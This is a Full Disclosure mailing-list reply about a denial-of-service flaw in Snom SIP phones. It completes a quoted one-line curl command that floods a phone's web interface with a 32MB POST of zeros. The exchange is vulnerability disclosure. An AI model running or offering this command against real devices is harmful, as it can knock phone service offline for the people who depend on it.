Message-ID: <CAJVSNc+OrZhQadw5ndP0-2rOiYr4U5H9xbsgU9UkvrXkRN7E-w@mail.gmail.com>
Date: Tue, 13 Jan 2015 09:52:19 +0100
From: "kapejod@...glemail.com" <kapejod@...il.com>
To: Martin Schuhmacher <broetchen25@....net>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Snom SIP phones denial of service through HTTP

The latest version is 8.7.3.25.9, there is no 8.7.4.X, yet.

And yes, you missed something (without the quotes): " --data-binary @-"
This turns it into an HTTP POST request and uses the input from stdin.
Otherwise you just do a regular HTTP GET which gets blocked because it's
not authenticated.


On Mon, Jan 12, 2015 at 10:20 PM, Martin Schuhmacher <broetchen25@....net>
wrote:

> Hi
>
> I just did
>
> $ dd if=/dev/zero bs=1M count=32 | curl http://$IP/
> Response: Unauthorized request
>
> Did I miss anything?
>
> Firmware: snom360-SIP 8.7.4.8
> not downloadable any more for some reason?
>
> Yours
> Martin
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> http://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
